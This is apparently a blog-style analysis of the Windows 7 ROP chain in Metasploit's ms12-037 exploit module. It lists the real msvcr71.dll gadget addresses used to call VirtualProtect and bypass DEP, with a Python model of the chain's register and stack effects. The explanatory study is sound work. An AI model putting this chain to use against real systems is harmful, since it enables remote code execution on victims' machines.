metasploit: ms12-037
There are two ROP implementations, one for XP SP3 and one for Win7 SP1.
Referring to the ROP chain for Win7 SP1: it uses msvcr71.dll (JRE 6 Update 26).
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0x00001000, # (dwSize)
0x7c347f98, # RETN (ROP NOP)
0x7c3415a2, # JMP [EAX]
0xffffffff,
0x7c376402, # skip 4 bytes
0x7c345255, # INC EBX # FPATAN # RETN
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c344f87, # POP EDX # RETN
0x00000040, # flNewProtect
0x7c34d201, # POP ECX # RETN
0x7c38b001, # &Writable location
0x7c347f97, # POP EAX # RETN
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
0x7c345c30, # ptr to 'push esp # ret '
The last three lines: (0x7c37a151 + 0x0EF) refers to the location where the IAT data for msvcr71.dll is stored. The data at that address is a pointer to kernel32.VirtualProtect.
So even though a hard-coded address is used to call VirtualProtect, this chain remains portable: the only fixed address is inside msvcr71.dll itself, and the loader fills the IAT slot with the correct kernel32 address on whatever system the DLL is loaded.
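As an added illustration (my own model, not code from the post or from the Metasploit module), the following Python replays the register and stack effects of the chain above and shows what reaches VirtualProtect. The IAT slot address 0x7c37a140, the stack pointer and the two VirtualProtect addresses are assumed or constructed values; note that ADD AL,0EF only changes the low byte of EAX, which is how 0x7c37a151 turns into the IAT slot address.

```python
# Added example (not the post's or Metasploit's code): a small register/stack
# model of the msvcr71.dll chain, to show what VirtualProtect is called with and
# why only msvcr71's own IAT slot address is hard-coded.
IAT_SLOT = 0x7C37A140   # assumed: msvcr71.dll IAT entry for kernel32.VirtualProtect

def add_al(eax, imm8):
    """ADD AL, imm8: only the low byte changes; the carry out of AL is discarded."""
    return (eax & 0xFFFFFF00) | ((eax + imm8) & 0xFF)

def run_chain(virtualprotect_addr, esp=0x0012FF00):
    """Replay the gadgets; esp is a constructed stack pointer at PUSHAD time."""
    memory = {IAT_SLOT: virtualprotect_addr}   # the only memory the chain reads
    r = {}
    # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
    r["eax"], r["edi"], r["esi"] = 0x00001000, 0x7C347F98, 0x7C3415A2
    r["ebx"], r["ebp"] = 0xFFFFFFFF, 0x7C376402
    # INC EBX # FPATAN # RETN -> EBX wraps from 0xffffffff to 0
    r["ebx"] = (r["ebx"] + 1) & 0xFFFFFFFF
    # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN -> EBX = dwSize = 0x1000
    r["ebx"] = (r["ebx"] + r["eax"]) & 0xFFFFFFFF
    r["eax"] = 1
    r["edx"] = 0x00000040        # POP EDX: flNewProtect
    r["ecx"] = 0x7C38B001        # POP ECX: writable location for lpflOldProtect
    r["eax"] = 0x7C37A151        # POP EAX: IAT slot address with AL "pre-subtracted"
    # PUSHAD # ADD AL,0EF # RETN. PUSHAD pushes EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI,
    # so from low to high address the stack now reads EDI,ESI,EBP,ESP,EBX,EDX,ECX,EAX.
    stack = [r["edi"], r["esi"], r["ebp"], esp, r["ebx"], r["edx"], r["ecx"], r["eax"]]
    r["eax"] = add_al(r["eax"], 0xEF)      # 0x7c37a151 -> 0x7c37a140, the IAT slot
    # RETN pops EDI (a RETN nop), which pops ESI (JMP [EAX]); [EAX] is VirtualProtect.
    assert stack[0] == 0x7C347F98 and stack[1] == 0x7C3415A2
    return {
        "eax": r["eax"],
        "target": memory[r["eax"]],    # address actually jumped to
        "ret": stack[2],               # EBP: the "skip 4 bytes" gadget
        "lpAddress": stack[3],         # pushed ESP: the stack itself
        "dwSize": stack[4],
        "flNewProtect": stack[5],
        "lpflOldProtect": stack[6],
        "skipped": stack[7],           # pushed EAX, stepped over by "skip 4 bytes"
    }

def is_portable():
    """Same chain, two constructed VirtualProtect locations: both are reached."""
    a = run_chain(0x7C8000AA)   # constructed, stands in for one OS build
    b = run_chain(0x75D000BB)   # constructed, stands in for another OS build
    return a["target"] == 0x7C8000AA and b["target"] == 0x75D000BB
```

After the "skip 4 bytes" gadget steps over the pushed EAX, the next stack dword is the 'push esp # ret' pointer, which is why the pushed ESP (the lpAddress made executable) is where the payload must follow.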
Kudos to Metasploit for exposing this nice trick.
Thank you.